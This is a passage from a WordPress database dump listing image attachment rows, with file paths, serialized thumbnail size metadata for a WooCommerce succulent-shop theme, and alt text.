:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(196,3112,'_wp_attached_file','2018/02/h5-img-8.jpg'),(197,3112,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:232;s:6:\"height\";i:232;s:4:\"file\";s:20:\"2018/02/h5-img-8.jpg\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(198,88,'_wp_attached_file','2018/01/about-us-img-3.png'),(199,88,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1157;s:6:\"height\";i:671;s:4:\"file\";s:26:\"2018/01/about-us-img-3.png\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"about-us-img-3-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"about-us-img-3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"about-us-img-3-600x348.png\";s:5:\"width\";i:600;s:6:\"height\";i:348;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"about-us-img-3-300x174.png\";s:5:\"width\";i:300;s:6:\"height\";i:174;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"about-us-img-3-1024x594.png\";s:5:\"width\";i:1024;s:6:\"height\";i:594;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"about-us-img-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"about-us-img-3-768x445.png\";s:5:\"width\";i:768;s:6:\"height\";i:445;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:26:\"about-us-img-3-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:26:\"about-us-img-3-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:26:\"about-us-img-3-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:27:\"about-us-img-3-1100x550.png\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:26:\"about-us-img-3-550x671.png\";s:5:\"width\";i:550;s:6:\"height\";i:671;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:27:\"about-us-img-3-1100x671.png\";s:5:\"width\";i:1100;s:6:\"height\";i:671;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:26:\"about-us-img-3-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"about-us-img-3-600x348.png\";s:5:\"width\";i:600;s:6:\"height\";i:348;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"about-us-img-3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(200,3447,'_wp_attached_file','2018/02/landing-footer-img2.png'),(201,3447,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:199;s:6:\"height\";i:185;s:4:\"file\";s:31:\"2018/02/landing-footer-img2.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-footer-img2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-footer-img2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-footer-img2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(202,2027,'_wp_attachment_image_alt','a'),(203,3112,'_wp_attachment_image_alt','o'),(204,3447,'_wp_attachment_image_alt','o'),(205,3113,'_wp_attached_file','2018/02/h5-img-9.jpg'),(206,3113,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:295;s:6:\"height\";i:213;s:4:\"file\";s:20:\"2018/02/h5-img-9.jpg\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-9-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-9-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-9-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(207,3113,'_wp_attachment_image_alt','o'),(208,2055,'_wp_attached_file','2018/02/team-member-4.jpg'),(209,2055,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:658;s:6:\"height\";i:658;s:4:\"file\";s:25:\"2018/02/team-member-4.jpg\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"team-member-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"team-member-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"team-member-4-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"team-member-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"team-member-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:25:\"team-member-4-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:25:\"team-member-4-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:25:\"team-member-4-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:25:\"team-member-4-658x550.jpg\";s:5:\"width\";i:658;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:25:\"team-member-4-550x658.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:658;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:25:\"team-member-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"team-member-4-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"team-member-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(210,3448,'_wp_attached_file','2018/02/landing-slide2-graphic3.png'),(211,3448,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:240;s:6:\"height\";i:205;s:4:\"file\";s:35:\"2018/02/landing-slide2-graphic3.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(212,3115,'_wp_attached_file','2018/02/h5-img-11.jpg'),(213,3115,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:312;s:6:\"height\";i:262;s:4:\"file\";s:21:\"2018/02/h5-img-11.jpg\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h5-img-11-300x262.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:262;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h5-img-11-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h5-img-11-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h5-img-11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"h5-img-11-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"h5-img-11-300x262.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:262;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h5-img-11-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(214,3448,'_wp_attachment_image_alt','o'),(215,1125,'_wp_attachment_image_alt','a'),(216,3115,'_wp_attachment_image_alt','o'),(217,3449,'_wp_attached_file','2018/02/landing-slide2-graphic4.png'),(218,3449,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:328;s:6:\"height\";i:339;s:4:\"file\";s:35:\"2018/02/landing-slide2-graphic4.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"landing-slide2-graphic4-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic4-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic4-290x300.png\";s:5:\"width\";i:290;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic4-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic4-328x300.png\";s:5:\"width\";i:328;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic4-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"landing-slide2-graphic4-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic4-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(219,3116,'_wp_attached_file','2018/02/h5-img-12.jpg'),(220,3116,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:214;s:6:\"height\";i:194;s:4:\"file\";s:21:\"2018/02/h5-img-12.jpg\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h5-img-12-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h5-img-12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h5-img-12-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(221,3116,'_wp_attachment_image_alt','o'),(222,1126,'_wp_attached_file','2018/01/product10-gallery3.jpg'),(223,1126,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:30:\"2018/01/product10-gallery3.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"product10-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"product10-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"product10-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"product10-gallery3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"product10-gallery3-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"product10-gallery3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"product10-gallery3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"product10-gallery3-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"product10-gallery3-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"product10-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"product10-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(224,3186,'_wp_attached_file','2018/02/h2-img-17.png'),(225,3186,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:87;s:6:\"height\";i:83;s:4:\"file\";s:21:\"2018/02/h2-img-17.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(226,3186,'_wp_attachment_image_alt','a'),(227,3187,'_wp_attached_file','2018/02/h2-img-18.png'),(228,3187,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:97;s:6:\"height\";i:83;s:4:\"file\";s:21:\"2018/02/h2-img-18.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(229,3187,'_wp_attachment_image_alt','a'),(230,3188,'_wp_attached_file','2018/02/h2-img-19.png'),(231,3188,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:79;s:6:\"height\";i:83;s:4:\"file\";s:21:\"2018/02/h2-img-19.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(232,3188,'_wp_attachment_image_alt','a'),(233,1126,'_wp_attachment_image_alt',''),(234,3189,'_wp_attached_file','2018/02/h2-img-20.png'),(235,3189,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:64;s:6:\"height\";i:83;s:4:\"file\";s:21:\"2018/02/h2-img-20.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(236,3189,'_wp_attachment_image_alt','a'),(237,1128,'_wp_attached_file','2018/01/product12-gallery1.jpg'),(238,1128,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:30:\"2018/01/product12-gallery1.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"product12-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"product12-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"product12-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"product12-gallery1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"product12-gallery1-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"product12-gallery1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"product12-gallery1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"product12-gallery1-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"product12-gallery1-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"product12-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"product12-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s